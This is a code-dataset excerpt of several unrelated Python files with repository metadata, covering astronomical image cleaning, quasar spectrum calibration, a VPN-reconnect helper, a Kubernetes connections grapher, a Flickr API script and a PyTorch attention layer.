'valid_init_op': valid_init_op,
'test_init_op': test_init_op}
return inputs
| 47.777778 | 226 | 0.7 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1,067 | 0.190877 |
443e880e410b850c486af0532ecd8869505aeb29 | 60 | py | Python | investigateModules/compareModulePatches.py | kromerh/solarAnalytics | 8d450746dcf45b5ae3933b5e2d8838a23c8b32ea | [
"MIT"
] | null | null | null | investigateModules/compareModulePatches.py | kromerh/solarAnalytics | 8d450746dcf45b5ae3933b5e2d8838a23c8b32ea | [
"MIT"
] | null | null | null | investigateModules/compareModulePatches.py | kromerh/solarAnalytics | 8d450746dcf45b5ae3933b5e2d8838a23c8b32ea | [
"MIT"
] | null | null | null | import pandas as pd
import numpy as np
import os
import re
| 10 | 19 | 0.783333 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 |
443fa902e796b93ad8d348cfbafd34b5dc71eedd | 15,348 | py | Python | amical/data_processing.py | anand0xff/AMICAL | 703ab4ead01054240ff5d43b6fb020d7877fd6cd | [
"MIT"
] | null | null | null | amical/data_processing.py | anand0xff/AMICAL | 703ab4ead01054240ff5d43b6fb020d7877fd6cd | [
"MIT"
] | null | null | null | amical/data_processing.py | anand0xff/AMICAL | 703ab4ead01054240ff5d43b6fb020d7877fd6cd | [
"MIT"
] | null | null | null | """
@author: Anthony Soulain (University of Sydney)
-------------------------------------------------------------------------
AMICAL: Aperture Masking Interferometry Calibration and Analysis Library
-------------------------------------------------------------------------
Function related to data cleaning (ghost, background correction,
centering, etc.) and data selection (sigma-clipping, centered flux,).
--------------------------------------------------------------------
"""
import numpy as np
from astropy.convolution import Gaussian2DKernel, interpolate_replace_nans
from astropy.io import fits
from matplotlib import pyplot as plt
from matplotlib.colors import PowerNorm
from termcolor import cprint
from tqdm import tqdm
from amical.tools import apply_windowing, crop_max
def _apply_patch_ghost(cube, xc, yc, radius=20, dx=0, dy=-200, method='bg'):
"""Apply a patch on an eventual artifacts/ghosts on the spectral filter (i.e.
K1 filter of SPHERE presents an artifact/ghost at (392, 360)).
Arguments:
----------
`cube` {array} -- Data cube,\n
`xc` {int} -- x-axis position of the artifact,\n
`yc` {int} -- y-axis position of the artifact.
Keyword Arguments:
----------
`radius` {int} -- Radius to apply the patch in a circle (default: {10}),\n
`dy` {int} -- Offset pixel number to compute background values (default: {0}),\n
`dx` {int} -- Same along y-axis (default: {0}),\n
`method` {str} -- If 'bg', the replacement values are the background computed at
xc+dx, yx+dy, else zero is apply (default: {'bg'}).
"""
cube_corrected = []
for i in range(len(cube)):
imA = cube[i].copy()
isz = imA.shape[0]
xc_off, yc_off = xc+dx, yc+dy
xx, yy = np.arange(isz), np.arange(isz)
xx_c = (xx-xc)
yy_c = (yc-yy)
xx_off = (xx-xc_off)
yy_off = (yc_off-yy)
distance = np.sqrt(xx_c**2 + yy_c[:, np.newaxis]**2)
distance_off = np.sqrt(xx_off**2 + yy_off[:, np.newaxis]**2)
cond_patch = (distance <= radius)
cond_bg = (distance_off <= radius)
if method == 'bg':
imA[cond_patch] = imA[cond_bg]
elif method == 'zero':
imA[cond_patch] = 0
cube_corrected.append(imA)
cube_corrected = np.array(cube_corrected)
return cube_corrected
def select_data(cube, clip_fact=0.5, clip=False, verbose=True, display=True):
""" Check the cleaned data cube using the position of the maximum in the
fft image (supposed to be zero). If not in zero position, the fram is
rejected. It can apply a sigma-clipping to select only the frames with the
highest total fluxes.
Parameters:
-----------
`cube` {array} -- Data cube,\n
`clip_fact` {float} -- Relative sigma if rejecting frames by
sigma-clipping (default=False),\n
`clip` {bool} -- If True, sigma-clipping is used,\n
`verbose` {bool} -- If True, print informations in the terminal,\n
`display` {bool} -- If True, plot figures.
"""
fft_fram = abs(np.fft.fft2(cube))
# flag_fram, cube_flagged, cube_cleaned_checked = [], [], []
fluxes, flag_fram, good_fram = [], [], []
for i in range(len(fft_fram)):
fluxes.append(fft_fram[i][0, 0])
pos_max = np.argmax(fft_fram[i])
if pos_max != 0:
flag_fram.append(i)
else:
good_fram.append(cube[i])
fluxes = np.array(fluxes)
flag_fram = np.array(flag_fram)
best_fr = np.argmax(fluxes)
worst_fr = np.argmin(fluxes)
std_flux = np.std(fluxes)
med_flux = np.median(fluxes)
if verbose:
if (med_flux/std_flux) <= 5.:
cprint('\nStd of the fluxes along the cube < 5 (%2.1f):\n -> sigma clipping is suggested (clip=True).' % (
(med_flux/std_flux)), 'cyan')
limit_flux = med_flux - clip_fact*std_flux
if clip:
cond_clip = (fluxes > limit_flux)
cube_cleaned_checked = cube[cond_clip]
ind_clip = np.where(fluxes <= limit_flux)[0]
else:
ind_clip = []
cube_cleaned_checked = np.array(good_fram)
ind_clip2 = np.where(fluxes <= limit_flux)[0]
if ((worst_fr in ind_clip2) and clip) or (worst_fr in flag_fram):
ext = '(rejected)'
else:
ext = ''
diffmm = 100*abs(np.max(fluxes) - np.min(fluxes))/med_flux
if display:
plt.figure()
plt.plot(fluxes, label=r'|$\Delta F$|/$\sigma_F$=%2.0f (%2.2f %%)' %
(med_flux/std_flux, diffmm))
if len(flag_fram) > 0:
plt.scatter(flag_fram, fluxes[flag_fram],
s=52, facecolors='none', edgecolors='r', label='Rejected frames (maximum fluxes)')
if clip:
if len(ind_clip) > 0:
plt.plot(ind_clip, fluxes[ind_clip], 'rx',
label='Rejected frames (clipping)')
else:
print('0')
plt.hlines(limit_flux, 0, len(fluxes), lw=1,
ls='--', label='Clipping limit', zorder=10)
plt.legend(loc='best', fontsize=9)
plt.ylabel('Flux [counts]')
plt.xlabel('# frames')
plt.grid(alpha=.2)
plt.tight_layout()
plt.figure(figsize=(7, 7))
plt.subplot(2, 2, 1)
plt.title('Best fram (%i)' % best_fr)
plt.imshow(cube[best_fr], norm=PowerNorm(.5), cmap='afmhot', vmin=0)
plt.subplot(2, 2, 2)
plt.imshow(np.fft.fftshift(fft_fram[best_fr]), cmap='gist_stern')
plt.subplot(2, 2, 3)
plt.title('Worst fram (%i) %s' % (worst_fr, ext))
plt.imshow(cube[worst_fr], norm=PowerNorm(.5), cmap='afmhot', vmin=0)
plt.subplot(2, 2, 4)
plt.imshow(np.fft.fftshift(fft_fram[worst_fr]), cmap='gist_stern')
plt.tight_layout()
plt.show(block=False)
if verbose:
n_good = len(cube_cleaned_checked)
n_bad = len(cube) - n_good
if clip:
cprint('\n---- σ-clip + centered fluxes selection ---', 'cyan')
else:
cprint('\n---- centered fluxes selection ---', 'cyan')
print('%i/%i (%2.1f%%) are flagged as bad frames' %
(n_bad, len(cube), 100*float(n_bad)/len(cube)))
return cube_cleaned_checked
def sky_correction(imA, r1=100, dr=20, verbose=False):
"""
Perform background sky correction to be as close to zero as possible.
"""
isz = imA.shape[0]
xc, yc = isz//2, isz//2
xx, yy = np.arange(isz), np.arange(isz)
xx2 = (xx-xc)
yy2 = (yc-yy)
r2 = r1 + dr
distance = np.sqrt(xx2**2 + yy2[:, np.newaxis]**2)
cond_bg = (r1 <= distance) & (distance <= r2)
try:
minA = imA.min()
imB = imA + 1.01*abs(minA)
backgroundB = np.mean(imB[cond_bg])
imC = imB - backgroundB
backgroundC = np.mean(imC[cond_bg])
except IndexError:
imC = imA.copy()
backgroundC = 0
if verbose:
cprint('Warning: Background not computed', 'green')
cprint(
'-> check the inner and outer radius rings (checkrad option).', 'green')
return imC, backgroundC
def fix_bad_pixels(image, bad_map, add_bad=[], x_stddev=1):
""" Replace bad pixels with values interpolated from their neighbors (interpolation
is made with a gaussian kernel convolution)."""
if len(add_bad) != 0:
for j in range(len(add_bad)):
bad_map[add_bad[j][0], add_bad[j][1]] = 1
img_nan = image.copy()
img_nan[bad_map == 1] = np.nan
kernel = Gaussian2DKernel(x_stddev=x_stddev)
fixed_image = interpolate_replace_nans(img_nan, kernel)
return fixed_image
def check_data_params(filename, isz, r1, dr, bad_map=None, add_bad=[],
edge=0, remove_bad=True, nframe=0, ihdu=0, f_kernel=3,
offx=0, offy=0, apod=False, window=None):
""" Check the input parameters for the cleaning.
Parameters:
-----------
`filename` {str}: filename containing the datacube,\n
`isz` {int}: Size of the cropped image (default: 256)\n
`r1` {int}: Radius of the rings to compute background sky (default: 100)\n
`dr` {int}: Outer radius to compute sky (default: 10)\n
`bad_map` {array}: Bad pixel map with 0 and 1 where 1 set for a bad pixel (default: None),\n
`add_bad` {list}: List of 2d coordinates of bad pixels/cosmic rays (default: []),\n
`edge` {int}: Number of pixel to be removed on the edge of the image (SPHERE),\n
`remove_bad` {bool}: If True, the bad pixels are removed using a gaussian interpolation,\n
`nframe` {int}: Frame number to be shown (default: 0),\n
`ihdu` {int}: Hdu number of the fits file. Normally 1 for NIRISS and 0 for SPHERE (default: 0).
"""
data = fits.open(filename)[ihdu].data
img0 = data[nframe]
if edge != 0:
img0[:, 0:edge] = 0
img0[:, -edge:-1] = 0
img0[0:edge, :] = 0
img0[-edge:-1, :] = 0
if (bad_map is not None) & (remove_bad):
img1 = fix_bad_pixels(img0, bad_map, add_bad=add_bad)
else:
img1 = img0.copy()
cropped_infos = crop_max(img1, isz, offx=offx, offy=offy, f=f_kernel)
pos = cropped_infos[1]
noBadPixel = False
bad_pix_x, bad_pix_y = [], []
if (bad_map is not None) or (len(add_bad) != 0):
for j in range(len(add_bad)):
bad_map[add_bad[j][0], add_bad[j][1]] = 1
bad_pix = np.where(bad_map == 1)
bad_pix_x = bad_pix[0]
bad_pix_y = bad_pix[1]
else:
noBadPixel = True
r2 = r1 + dr
theta = np.linspace(0, 2*np.pi, 100)
x0 = pos[0]
y0 = pos[1]
x1 = r1 * np.cos(theta) + x0
y1 = r1 * np.sin(theta) + y0
x2 = r2 * np.cos(theta) + x0
y2 = r2 * np.sin(theta) + y0
if window is not None:
r3 = window
x3 = r3 * np.cos(theta) + x0
y3 = r3 * np.sin(theta) + y0
xs1, ys1 = x0 + isz//2, y0 + isz//2
xs2, ys2 = x0 - isz//2, y0 + isz//2
xs3, ys3 = x0 - isz//2, y0 - isz//2
xs4, ys4 = x0 + isz//2, y0 - isz//2
max_val = img1[y0, x0]
fig = plt.figure(figsize=(6, 6))
plt.imshow(img1, norm=PowerNorm(.5), cmap='afmhot', vmin=0, vmax=max_val)
plt.plot(x1, y1, label='Inner radius for sky subtraction')
plt.plot(x2, y2, label='Outer radius for sky subtraction')
if apod:
if window is not None:
plt.plot(x3, y3, label='Super-gaussian windowing')
plt.plot(x0, y0, '+', color='g', ms=10, label='Centering position')
plt.plot([xs1, xs2, xs3, xs4, xs1], [ys1, ys2, ys3, ys4, ys1], 'w--',
label='Resized image')
if not noBadPixel:
if remove_bad:
label = 'Fixed hot/bad pixels'
else:
label = 'Hot/bad pixels'
plt.scatter(bad_pix_y, bad_pix_x, color='', marker='s',
edgecolors='r', s=20, label=label)
plt.legend(fontsize=7, loc=1)
plt.tight_layout()
return fig
def clean_data(data, isz=None, r1=None, dr=None, edge=0,
r2=None, bad_map=None, add_bad=[], apod=True,
offx=0, offy=0, sky=True, window=None,
f_kernel=3, verbose=False):
""" Clean data.
Parameters:
-----------
`data` {np.array} -- datacube containing the NRM data\n
`isz` {int} -- Size of the cropped image (default: {None})\n
`r1` {int} -- Radius of the rings to compute background sky (default: {None})\n
`dr` {int} -- Outer radius to compute sky (default: {None})\n
`edge` {int} -- Patch the edges of the image (VLT/SPHERE artifact, default: {200}),\n
`checkrad` {bool} -- If True, check the resizing and sky substraction parameters (default: {False})\n
Returns:
--------
`cube` {np.array} -- Cleaned datacube.
"""
# print(data.shape[1])
# if data.shape[1] % 2 == 1:
# data = np.array([im[:-1, :-1] for im in data])
n_im = data.shape[0]
cube_cleaned = np.zeros([n_im, isz, isz])
for i in tqdm(range(n_im), ncols=100, desc='Cleaning', leave=False):
img0 = data[i]
if edge != 0:
img0[:, 0:edge] = 0
img0[:, -edge:-1] = 0
img0[0:edge, :] = 0
img0[-edge:-1, :] = 0
if bad_map is not None:
img1 = fix_bad_pixels(img0, bad_map, add_bad=add_bad)
else:
img1 = img0.copy()
im_rec_max = crop_max(img1, isz, offx=offx, offy=offy, f=f_kernel)[0]
if sky:
img_biased = sky_correction(im_rec_max, r1=r1, dr=dr,
verbose=verbose)[0]
else:
img_biased = im_rec_max.copy()
img_biased[img_biased < 0] = 0 # Remove negative pixels
if img_biased.shape[0] != img_biased.shape[1]:
cprint(
'\nCropped image do not have same X, Y dimensions -> check isz', 'red')
return None
if apod:
if r2 is None:
r2 = isz//3
img = apply_windowing(img_biased, window=window)
else:
img = img_biased.copy()
cube_cleaned[i] = img
return cube_cleaned
def select_clean_data(filename, isz=256, r1=100, r2=None, dr=10, edge=0,
clip=True, bad_map=None, add_bad=[], offx=0, offy=0,
clip_fact=0.5, apod=True, sky=True, window=None,
f_kernel=3, verbose=False, ihdu=0, display=False):
""" Clean and select good datacube (sigma-clipping using fluxes variations).
Parameters:
-----------
`filename` {str}: filename containing the datacube,\n
`isz` {int}: Size of the cropped image (default: 256)\n
`r1` {int}: Radius of the rings to compute background sky (default: 100)\n
`dr` {int}: Outer radius to compute sky (default: 10)\n
`edge` {int}: Patch the edges of the image (VLT/SPHERE artifact, default: {100}),\n
`clip` {bool}: If True, sigma-clipping is used to reject frames with low integrated flux,\n
`clip_fact` {float}: Relative sigma if rejecting frames by sigma-clipping
(default=0.5),\n
Returns:
--------
`cube_final` {np.array}: Cleaned and selected datacube.
"""
hdu = fits.open(filename)
cube = hdu[ihdu].data
hdr = hdu[0].header
if hdr['INSTRUME'] == 'SPHERE':
seeing_start = float(hdr['HIERARCH ESO TEL AMBI FWHM START'])
seeing = float(hdr['HIERARCH ESO TEL IA FWHM'])
seeing_end = float(hdr['HIERARCH ESO TEL AMBI FWHM END'])
if verbose:
print('\n----- Seeing conditions -----')
print("%2.2f (start), %2.2f (end), %2.2f (Corrected AirMass)" %
(seeing_start, seeing_end, seeing))
raw_size = cube.shape[1]
if isz > raw_size:
raise ValueError(
'Reshape factor is larger than the data size (choose a smaller isz).')
cube_cleaned = clean_data(cube, isz=isz, r1=r1, edge=edge,
r2=r2, bad_map=bad_map, add_bad=add_bad,
dr=dr, sky=sky, apod=apod, window=window,
f_kernel=f_kernel, offx=offx, offy=offy,
verbose=verbose)
if cube_cleaned is None:
return None
cube_final = select_data(cube_cleaned, clip=clip, clip_fact=clip_fact,
verbose=verbose, display=display)
return cube_final
| 36.805755 | 118 | 0.573495 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 5,602 | 0.364975 |
4440960cf020e65d9360167e1a2a885b0c4dd7d8 | 5,107 | py | Python | lyaf_optdepth/corrections.py | VikrantKamble/lyaf_optdepth | 899048ab73e546513b3713b3818abfab3ce3ab05 | [
"MIT"
] | null | null | null | lyaf_optdepth/corrections.py | VikrantKamble/lyaf_optdepth | 899048ab73e546513b3713b3818abfab3ce3ab05 | [
"MIT"
] | null | null | null | lyaf_optdepth/corrections.py | VikrantKamble/lyaf_optdepth | 899048ab73e546513b3713b3818abfab3ce3ab05 | [
"MIT"
] | null | null | null | import numpy as np
import matplotlib.pyplot as plt
from scipy.stats import binned_statistic
def var_correct(qso, rest_ranges=None, zq_range=[1.6, 4.], fit_model=True,
savefile=False):
""" Corrections to the vriance assigned to the pixels by the pipeline
Notes:
1. Scaling spectra doesn't affect this estimate
2. If the spectra changes by a lot(isn't flat), it will lead to
underestimates of eta
"""
if rest_ranges is None:
rest_ranges = [[1350, 1360], [1470, 1480]]
zq_ind = np.where((qso.zq > zq_range[0]) & (qso.zq <= zq_range[1]) & (qso.sn > 5))[0]
# restframe ranges over which to analyze
# currently this allows for only a single bin
if np.asarray(rest_ranges).ndim == 1:
raise TypeError("Please provide the ranges as two dimensional array")
lambda_mean, eta = [], []
for ranges in rest_ranges:
ind_set = (qso.wl > ranges[0]) & (qso.wl <= ranges[1])
# create local flux and ivar matrices
loc_flux = qso.flux[zq_ind[:, None], ind_set]
loc_ivar = qso.ivar[zq_ind[:, None], ind_set]
# mask to select pixels that provide information
ivar_mask = loc_ivar > 0
# sum of good pixels along each spectra where num is greater than 10
num = np.sum(ivar_mask, 1)
num_ind = num > 10
# chi-square along each spectra
# eta = N / sum((f_i - mu)^2 / sigma_i^2)
mu = np.average(loc_flux[num_ind], weights=loc_ivar[num_ind], axis=1)
chisq = np.sum((
loc_flux[num_ind] - mu[:, None]) ** 2 * loc_ivar[num_ind], axis=1)
lambda_obs = np.array((np.mat(qso.wl[ind_set]).T *
np.mat(1 + qso.zq[zq_ind][num_ind]))).T
# mean of observed wavelength spanned along each spectra
lambda_mean += list(np.average(lambda_obs, weights=ivar_mask[num_ind], axis=1))
# eta values along each spectra
eta += list(num[num_ind] / chisq)
# binned statistic with scipy
y, bin_edges, __ = binned_statistic(lambda_mean, eta,
statistic='mean', bins=100)
bin_width = (bin_edges[1] - bin_edges[0])
X = bin_edges[1:] - bin_width/2
# plot the results if specified
fig, ax = plt.subplots(1)
ax.plot(X, y, '+', color='k', markersize=8)
# fit a simple piecewise function to the data
if fit_model:
popt1 = np.polyfit(X[X < 5850], y[X < 5850], deg=1)
popt2 = np.polyfit(X[X > 5850], y[X > 5850], deg=2)
xline1 = np.linspace(3500, 5850, 100)
ax.plot(xline1, np.polyval(popt1, xline1), '-r')
xline2 = np.linspace(5850, 7500, 100)
ax.plot(xline2, np.polyval(popt2, xline2), '--r')
ax.set_xlabel(r'$\lambda_\mathrm{obs} [\mathrm{\AA}]$')
plt.show()
if savefile:
np.savetxt("var_correct.txt", list(popt1) + list(popt2))
def calibrate(wl, spec, ivar, zq, rest_range, norm_min, norm_max, savetag,
plotit=False):
""" Obtain flux calibration vector by doing optical depth analysis redwards
of Lyman-Alpha
Only the shape is estimated, the overall normalization is unconstrained
"""
# Collect relevant indices over restframe
r_ind = []
for j in range(len(rest_range)):
foo = np.where((wl > rest_range[j][0]) & (wl < rest_range[j][1]))[0]
r_ind = np.concatenate((r_ind, foo))
rInd = r_ind.astype(int)
# Obtain the corresponding data matrices
lam_obs = np.array(np.mat(wl[rInd]).T * np.mat(1 + zq)).T
cflux, civar = spec[:, rInd], ivar[:, rInd]
# Scale to the same baseline
# this will introduce addtional errors that we are neglecting
nValue = np.zeros(len(rInd))
for i in range(len(rInd)):
blah = np.where((lam_obs[:, i] > norm_min) & (lam_obs[:, i] < norm_max)
& (civar[:, i] > 0))[0]
nValue[i] = np.average(cflux[:, i][blah], weights=civar[:, i][blah])
# Scale fluxes and ivars accordingly
NormFlux = cflux / nValue
NormIvar = civar * nValue ** 2
pixObs = np.ravel(lam_obs)
pixFlux, pixIvar = np.ravel(NormFlux), np.ravel(NormIvar)
# Controls the smoothing of the results
ObsBin = np.arange(3500, 7000, 3)
# Correction vector
Cvec = np.zeros(len(ObsBin) - 1)
for k in range(len(Cvec)):
bInd = np.where((pixObs > ObsBin[k]) & (pixObs <= ObsBin[k + 1])
& (pixIvar > 0) & np.isfinite(pixFlux))[0]
if len(bInd) > 5:
Cvec[k] = np.average(pixFlux[bInd], weights=pixIvar[bInd])
Lvec = (ObsBin[1:] + ObsBin[:-1])/2.
if plotit:
plt.figure()
good = Cvec != 0
plt.plot(Lvec[good], Cvec[good], '-k', lw=0.6)
plt.xlabel(r'$\lambda_{obs}$')
plt.ylabel(r'$Correction$')
# plt.xlim(1.8 , 3)
plt.ylim(0.9, 1.1)
plt.axhline(1, c='r')
plt.show()
if savetag is not None:
np.savetxt('../Data/calibration' + savetag + '.dat',
[Lvec[good], Cvec[good]])
# EOF
| 35.465278 | 89 | 0.585079 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1,428 | 0.279616 |
4440ac3805231c8fe777bc392e2e8cc3c24645a4 | 336 | py | Python | backend/common/databases/tosurnament/user.py | SpartanPlume/Tosurnament | 07e6b067a6c78a589de1a461789bce02352220fb | [
"MIT"
] | 7 | 2018-03-13T12:21:37.000Z | 2021-07-10T21:47:05.000Z | backend/common/databases/tosurnament/user.py | SpartanPlume/Tosurnament | 07e6b067a6c78a589de1a461789bce02352220fb | [
"MIT"
] | 44 | 2017-12-28T15:22:27.000Z | 2021-09-17T20:56:17.000Z | backend/common/databases/tosurnament/user.py | SpartanPlume/Tosurnament | 07e6b067a6c78a589de1a461789bce02352220fb | [
"MIT"
] | 9 | 2020-07-03T10:07:05.000Z | 2022-02-27T15:09:11.000Z | """User table"""
from mysqldb_wrapper import Base, Id
class User(Base):
"""User class"""
__tablename__ = "user"
id = Id()
discord_id = bytes()
discord_id_snowflake = str()
osu_id = str()
verified = bool()
code = bytes()
osu_name = str()
osu_name_hash = bytes()
osu_previous_name = str()
| 16.8 | 36 | 0.595238 | 278 | 0.827381 | 0 | 0 | 0 | 0 | 0 | 0 | 38 | 0.113095 |
4444e7e0112d27b6a6afe52aecc7a8352ed7a487 | 801 | py | Python | snakeswitch.py | TheRedSpy15/Snakeswitch | 082a07d6994a04c6cecfaa0a0868a37bdd373b51 | [
"MIT"
] | null | null | null | snakeswitch.py | TheRedSpy15/Snakeswitch | 082a07d6994a04c6cecfaa0a0868a37bdd373b51 | [
"MIT"
] | null | null | null | snakeswitch.py | TheRedSpy15/Snakeswitch | 082a07d6994a04c6cecfaa0a0868a37bdd373b51 | [
"MIT"
] | null | null | null | from requests import get
import time
import gi
ip_starting = ""
recon_command = ""
rate = 60
def main():
print("Example: nordvpn disconnect && nordvpn connect")
recon_command = input("Enter the command used to reconnect to VPN: ")
ip_starting = get('https://api.ipify.org').text
print("Starting ip:", ip_starting)
print("Connect to your VPN now!")
import subprocess
while True:
time.sleep(rate)
print("checking ip")
if ip_starting == get('https://api.ipify.org').text:
print("Snakeswitch activated")
subprocess.run('notify-send Snakeswitch activated', shell=True)
subprocess.run(recon_command)
if __name__ == '__main__':
try:
main()
except KeyboardInterrupt:
print('Interrupted')
try:
import sys
sys.exit(0)
except SystemExit:
import os
os._exit(0)
| 20.025 | 70 | 0.70412 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 278 | 0.347066 |
44450985c3f99b89a21c4bb41bf9942469e1672d | 3,093 | py | Python | consumerui/grapher.py | AlexRogalskiy/kubeplus | eba34118cf721391abd9f97196bbfaa85c6f5079 | [
"Apache-2.0"
] | 396 | 2018-03-30T19:56:17.000Z | 2022-03-23T09:35:31.000Z | grapher/connections.py | cloud-ark/kubeplus | 1ee8fdd1dc53f83316883752a8ebb33708faedaf | [
"Apache-2.0"
] | 182 | 2018-04-24T03:12:00.000Z | 2022-02-28T18:27:11.000Z | grapher/connections.py | AlexRogalskiy/kubeplus | eba34118cf721391abd9f97196bbfaa85c6f5079 | [
"Apache-2.0"
] | 64 | 2018-04-25T00:02:37.000Z | 2022-03-16T02:46:03.000Z | import sys
import json
import subprocess
import sys
import os
from graphviz import Digraph
from graphviz import Graph
class ConnectionsGraph(object):
def draw(self, connections_json, output_folder, relsToHide):
#print(connections_json)
cmd = "ls -ltr /root/"
out = subprocess.Popen(cmd, stdout=subprocess.PIPE, stderr=subprocess.PIPE, shell=True).communicate()[0]
#print(out)
fp = open(output_folder + "/" + connections_json, "r")
json_data = fp.read()
json_output = json.loads(json_data)
#print(json_output)
nodemap = {}
for n in json_output:
level = n['Level']
if level in nodemap.keys():
nodelist = nodemap[level]
else:
nodelist = []
nodelist.append(n)
nodemap[level] = nodelist
#print(nodemap)
opformat = 'png'
dot = Graph(comment='Connections Graph', format=opformat)
# dot.node('A', 'King Shivaji')
# dot.node('B', 'Sir Bedevere the Wise')
# dot.node('L', 'Sir Lancelot the Brave')
relsToHideList1 = relsToHide.split(",")
relsToHideList = []
for rel in relsToHideList1:
relsToHideList.append(rel.strip())
#print(relsToHideList)
# Create Nodes
for level, nodelist in nodemap.items():
for n in nodelist:
fqnodename = n['Kind'] + " " + n['Name']
fqpeername = n['PeerKind'] + " " + n['PeerName']
#print(fqnodename + " " + fqpeername)
if n['Kind'] == 'Pod':
dot.node(fqnodename, fqnodename, shape='box', style='filled', color='lightcyan1')
else:
dot.node(fqnodename, fqnodename, shape='box', style='filled', color='snow2')
if level > 0:
color = 'gray0'
relationshipType = n['RelationType']
relationshipDetails = n['RelationDetails']
relationInfo = relationshipType
if relationshipDetails != '' and relationshipType not in relsToHideList:
relationInfo = relationInfo + " (" + relationshipDetails + ")"
if relationshipType == 'specproperty':
color = 'crimson'
if relationshipType == 'label':
color = 'darkgreen'
if relationshipType == 'envvariable':
color = 'gold4'
if relationshipType == 'annotation':
color = 'indigo'
if relationshipType == 'owner reference':
color = 'blue'
dot.edge(fqpeername, fqnodename, color=color, label=relationInfo)
# Create edges
#dot.edges(['AB', 'AL'])
#dot.edge('B', 'L', constraint='false')
#print(dot.source)
filename = connections_json + ".gv"
rendered_file_path = dot.render('/root/' + filename, view=False)
#print("FILENAME:" + filename)
#print("Rendered file path:" + rendered_file_path)
#print("Output available in " + filename + "." + opformat)
#fp1 = open(output_folder + "/abc.txt", "w")
#fp1.write(connections_json)
#fp1.close()
if __name__ == '__main__':
graph = ConnectionsGraph()
#print("Inside connections.py")
connections_json = sys.argv[1]
output_folder = sys.argv[2]
if len(sys.argv) == 4:
relsToHide = sys.argv[3]
else:
relsToHide = ""
#print("Connections_json:"+ connections_json)
#print("Output folder:" + output_folder)
#print(relsToHide)
graph.draw(connections_json, output_folder, relsToHide)
| 30.029126 | 106 | 0.669253 | 2,578 | 0.833495 | 0 | 0 | 0 | 0 | 0 | 0 | 1,034 | 0.334303 |
44460ed3ad075b11814a0994ca4285eafdbb39b1 | 823 | py | Python | scratch/interesting_cc.py | mikeboers/PyFlickr | 60f258ad6a5266fa8d8e6f6dc829e90e61df9696 | [
"BSD-3-Clause"
] | null | null | null | scratch/interesting_cc.py | mikeboers/PyFlickr | 60f258ad6a5266fa8d8e6f6dc829e90e61df9696 | [
"BSD-3-Clause"
] | null | null | null | scratch/interesting_cc.py | mikeboers/PyFlickr | 60f258ad6a5266fa8d8e6f6dc829e90e61df9696 | [
"BSD-3-Clause"
] | null | null | null | import os
import sys
import datetime
from pprint import pprint
import logging
logging.basicConfig(file=sys.stderr, level=logging.DEBUG)
from flickr import Flickr
from flickr.util import *
key = os.environ.get('FLICKR_KEY')
secret = os.environ.get('FLICKR_SECRET')
if not (key and secret):
print 'please set FLICKR_KEY and FLICKR_SECRET'
exit(1)
flickr = Flickr((key, secret), format='json', echo=True)
one_day = datetime.timedelta(days=1)
date = datetime.date.today()
found = 0
while found < 10:
date -= one_day
print '---', date
for photo in flickr.interestingness.getList.iter(date=str(date), extras='license', per_page=25):
if photo['license'] == '0':
continue
found += 1
print found, short_url(photo['id'])
if found == 10:
break
| 21.657895 | 100 | 0.663426 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 104 | 0.126367 |
44474deb5fa0c086545a3adfa369f518e9e5f9f5 | 2,415 | py | Python | fused_biattention.py | utahnlp/layer_augmentation_qa | a3dd2d7af6f45b2aa500ff7612f77c31fb879cf0 | [
"Apache-2.0"
] | 6 | 2019-10-08T11:48:21.000Z | 2021-05-28T07:00:56.000Z | fused_biattention.py | utahnlp/layer_augmentation_qa | a3dd2d7af6f45b2aa500ff7612f77c31fb879cf0 | [
"Apache-2.0"
] | null | null | null | fused_biattention.py | utahnlp/layer_augmentation_qa | a3dd2d7af6f45b2aa500ff7612f77c31fb879cf0 | [
"Apache-2.0"
] | 1 | 2020-07-02T06:31:06.000Z | 2020-07-02T06:31:06.000Z | import sys
import torch
from torch import nn
from torch.autograd import Variable
from view import *
from holder import *
from util import *
from join_table import *
from trilinear_prod import *
from fusion import *
# fused bidir attention
class FusedBiAttention(torch.nn.Module):
def __init__(self, opt, shared):
super(FusedBiAttention, self).__init__()
self.opt = opt
self.shared = shared
enc_size = opt.hidden_size if 'elmo' not in opt.enc else opt.hidden_size + opt.elmo_size
self.trilinear_prod = TrilinearProd(opt, enc_size)
self.fusion = Fusion(opt, enc_size)
self.softmax2 = nn.Softmax(2)
self.phi_joiner = JoinTable(2)
def biattention(self, scores, C, Q):
batch_l = self.shared.batch_l
context_l = self.shared.context_l
enc_size = C.shape[2]
# attention
att1 = self.softmax2(scores) # (batch_l, context_l, max_query_l)
att2 = self.softmax2(scores.transpose(1,2)) # (batch_l, max_query_l, context_l)
# attend
agg1 = att1.bmm(Q) # (batch_l, context_l, enc_size)
agg2 = att2.bmm(C) # (batch_l, max_query_l, enc_size)
agg2 = self.masked_fill_query(agg2)
return att1, att2, agg1, agg2
def masked_fill_scores(self, scores):
return scores * self.shared.score_mask + (self.shared.one - self.shared.score_mask) * self.shared.neg_inf
def masked_fill_query(self, query):
return query * self.shared.query_mask.unsqueeze(-1)
# input encodings of context (C) and query (Q)
# C of shape (batch_l, context_l, hidden_size)
# Q of shape (batch_l, query_l, hidden_size)
def forward(self, C, Q):
self.update_context()
batch_l = self.shared.batch_l
context_l = self.shared.context_l
max_query_l = self.shared.query_l.max()
hidden_size = self.opt.hidden_size
# get similarity score
scores = self.trilinear_prod(C, Q)
scores = self.masked_fill_scores(scores)
#
att1, att2, agg1, agg2 = self.biattention(scores, C, Q)
#
G = self.fusion(C, agg1)
P = self.fusion(Q, agg2)
P = self.masked_fill_query(P)
# bookkeeping
self.shared.att_soft1 = att1
self.shared.att_soft2 = att2
self.shared.G = G
self.shared.P = P
return att1, att2, G
def update_context(self):
batch_l = self.shared.batch_l
context_l = self.shared.context_l
max_query_l = self.shared.query_l.max()
word_vec_size = self.opt.word_vec_size
hidden_size = self.opt.hidden_size
def begin_pass(self):
pass
def end_pass(self):
pass
| 23.446602 | 107 | 0.719669 | 2,166 | 0.896894 | 0 | 0 | 0 | 0 | 0 | 0 | 357 | 0.147826 |
